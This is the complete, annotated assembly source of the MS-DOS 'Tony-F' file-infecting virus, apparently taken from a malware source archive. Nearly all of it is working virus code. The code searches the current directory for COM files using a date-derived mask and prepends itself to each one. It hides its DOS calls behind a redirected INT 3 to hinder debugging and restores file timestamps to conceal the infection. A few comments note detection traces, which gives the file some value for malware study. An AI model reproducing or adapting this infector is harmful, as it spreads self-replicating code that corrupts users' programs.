MalwareSourceCode/MSDOS/T-Index/Virus.MSDOS.Unknown.tony-f.asm

;------------------------------------------------------------------------------;
; ;
; Virus Tony-F ;
; ;
; Tony_F is a parasitic virus. It works as follows: when an infected file is ;
; started, the virus searches the whole current directory and infects all ;
; files matching ?*.COM, where ? depends on the date. ;
; Tony-F places itself before the code of the infected file. The virus installs ;
; its own procedure for handling critical errors (vector 24h) and does not ;
; change the date and time of the infected files. ;
; Tony-F finds the original address of vector 21h and places it in the ;
; interrupt table as vector 3; this operation hinders any attempt to trace ;
; the virus with a debugger. ;
;------------------------------------------------------------------------------;
; Assemble with Turbo Assembler 2.0+
.model Tiny
.code
VirLen = offset EndCode - offset Start ; Length of the virus body (Start up to EndCode).
;-----------------------------------------------------------------------------;
; Data overlay: every item below is an uninitialised ('?') placeholder that
; only gives a name to an offset in the running segment.
Org 07Fh
INT24 db ? ; The INT 24h (critical error) vector will be pointed at this byte.
Org 0100h
; The names below lay out a 2Bh-byte DOS DTA (find-first/find-next record)
; starting at offset 100h, the same offset that Start is assembled at.
NewDTA db 15h dup (?) ; DTA structure (first 15h bytes are not named individually).
FAttr db ? ; offset 115h
FTime dw ? ; offset 116h - read back after the file has been rewritten
FDate dw ? ; offset 118h - read back after the file has been rewritten
FLen dw ?, ? ; offset 11Ah, two words
FName db 0Dh dup (?) ; offset 11Eh - name handed to the open call
;-----------------------------------------------------------------------------;
Org 100h
; Entry point. Order of work in this run of statements:
;   1. locate the INT 21h entry inside the DOS segment by byte signature,
;   2. install that address as interrupt vector 3,
;   3. point INT 24h at a single IRET byte,
;   4. copy the code to the segment 64 KBytes above CS,
;   5. set a private DTA and issue Find First with a date-derived file mask.
; NOTE(analysis): after step 2 every DOS service in this file is requested
; with "Int 3" instead of "Int 21h", so an "Int 21h" opcode search misses
; these calls, and the breakpoint vector no longer belongs to a debugger.
Start:
push ax ; Save the contents of AX (popped again at TRansF).
;...... Search for the original INT 21h vector inside the DOS segment.
mov ax,1203h
int 2Fh ; Reads the DOS segment; the lodsw/lodsb scan below reads from DS:SI.
xor si,si ; The original vector is located by its first
Again: ; three bytes - 2Eh, 3Ah and 26h.
lodsw
cmp ax,3A2Eh ; bytes 2Eh,3Ah compared as one little-endian word
je NextByte
dec si ; lodsw advanced by 2; step back 1 so the scan moves byte by byte
jnz Again ; ZF set here means SI wrapped to 0: the whole segment was scanned
jmp Done ; signature not found: the infection pass is skipped
NextByte:
lodsb
cmp al,26h
jne Again
Found:
sub si,03 ; SI back to the first byte of the matched signature
mov dx,si
mov ax,2503H ; The located INT 21h entry is installed in place of
Int 21h ; vector 3 (set-vector call, DS:DX = match address).
push cs ; Restore the value of DS (DS := CS).
pop ds
;...... Redirect the critical-error vector.
mov INT24,0CFh ; Creates a new INT 24h handler - a lone IRET (opcode 0CFh).
mov ax,2524h
mov dx,offset INT24
Int 3 ; Redirects vector 24h to DS:INT24.
; NOTE(analysis): presumably done so that a failing disk operation does not
; bring up the DOS critical-error prompt - confirm by tracing in an emulator.
mov ax,cs
add ah,10h
mov es,ax ; ES = CS + 64 KBytes
mov si,offset Start
xor di,di
mov cx,si ; Copies the virus code 64 KBytes
rep movsb ; higher in memory (CX = offset Start bytes, DS:SI -> ES:0).
mov dx,offset NewDTA ; Sets the DTA to a new address.
mov ah,1Ah
Int 3
mov ah,2Ah
Int 3 ; Asks DOS for the date,
add dl,'A' ; and the first letter of the files to infect
mov AllCom ,dl ; is derived from it (DL + 'A' overwrites the '+' placeholder).
;...... Start of the search for files to infect.
mov dx, offset AllCom ; Searches for all '<letter>*.COM' files.
mov cl,110B ; search attribute bits 1 and 2 (hidden, system); CH is not set here
mov ah,4Eh ; Calls Find First.
Int 3
jc Done ; Carries on to Done when there are no
; files to infect.
; Per-file loop. Each match from Find First / Find Next is opened, read in
; full behind the code copy held in the segment 64 KBytes above CS, checked
; for the marker, rewritten from offset 0 and closed.
; NOTE(analysis): observable traces on a changed file, all taken from the
; statements below: the file grows by VirLen bytes, the byte compared at
; Mark + VirLen - 100h is 'T' (first letter of the 'Tony' marker), and the
; stored time/date are written back, so timestamps do not show the change.
FindNext:
mov dx,offset Fname ; DX = address of the file name inside the DTA.
mov ax,3D02h ; Opens the file for read/write.
Int 3
mov bx,ax ; Keeps the handle of the opened file.
push ds ; Saves DS.
push es
pop ds ; DS = CS + 64 KBytes.
mov dx,VirLen ; DX = length of the virus.
mov cx,-1 ; The whole file is read to address DS:DX.
mov ah,3Fh ; The virus copy already sits there, and now
Int 3 ; the file follows it.
; Increases the file length (AX) by
add ax,Virlen ; the length of the virus.
jc Close ; On overflow the file is not infected.
cmp Byte ptr ds:[ Mark + VirLen -100h ],'T' ; Is the file already infected?
je Close
push ax ; Saves the file length on the stack.
xor cx,cx
xor dx,dx
mov ax,4200h ; Moves the file pointer (CX:DX)
Int 3 ; to the start of the file.
pop cx ; Reads the file length back from the stack.
; DX equals 0 after Fn 42.
mov ah,40h ; From address DS:DX, virus + file
Int 3 ; are written to disk.
mov cx,cs:FTime
mov dx,cs:FDate ; The date and time of the infected
mov ax,5701h ; file are restored from the DTA.
Int 3
Close:
pop ds ; Restores DS.
mov ah,3Eh ; Closes the file.
Int 3
mov ah,4Fh
Int 3 ; Calls Find Next;
jnc FindNext ; if there are more files everything is repeated
; for them as well.
;....... Start of launching the program to which the virus is attached.
Done:
mov dx,80h
mov ah,1Ah
Int 3 ; Restores the old DTA address (DS:80h).
push es
mov ax,offset TransF -100h ; Hands control to the copy of the virus
push ax ; that is 64 KBytes higher,
RETF ; at label TransF (far return to ES:TransF-100h).
;........................................
; Marker used to recognise infected
Mark db 'Tony' ; files.
AllCom db '+' ; Placeholder letter; overwritten at run time with DL + 'A'.
db '*.COM',0 ; Mask for finding all files
;.......................................; to infect.
; NOTE(analysis): the bytes 'Tony', one variable letter and '*.COM',0 sit
; next to each other in the code and can serve as a static match string.
; Runs from the copy 64 KBytes above the original segment (reached through
; the far return at Done). Moves the host code down to offset 100h of the
; original segment and far-returns into it.
TRansF:
push ds
pop es ; ES = DS (destination segment for the move below)
pop ax ; Restores the contents of AX saved at Start.
mov si,offset EndCode ; Moves the code of the program that starts
mov di,offset Start ; right after the virus down to offset 100h.
push ds ; Prepares on the stack the address for the jump
push di ; to the start of the original program (DS:100h).
mov cx,0FFF0h -102h -Virlen ; byte count for the move
rep movsb
RETF ; far return to the DS:DI pair pushed above
;-----------------------------------------------------------------------------;
EndCode:
Ret ; The infected program starts from here (in this source it is a single Ret).
;-----------------------------------------------------------------------------;
End Start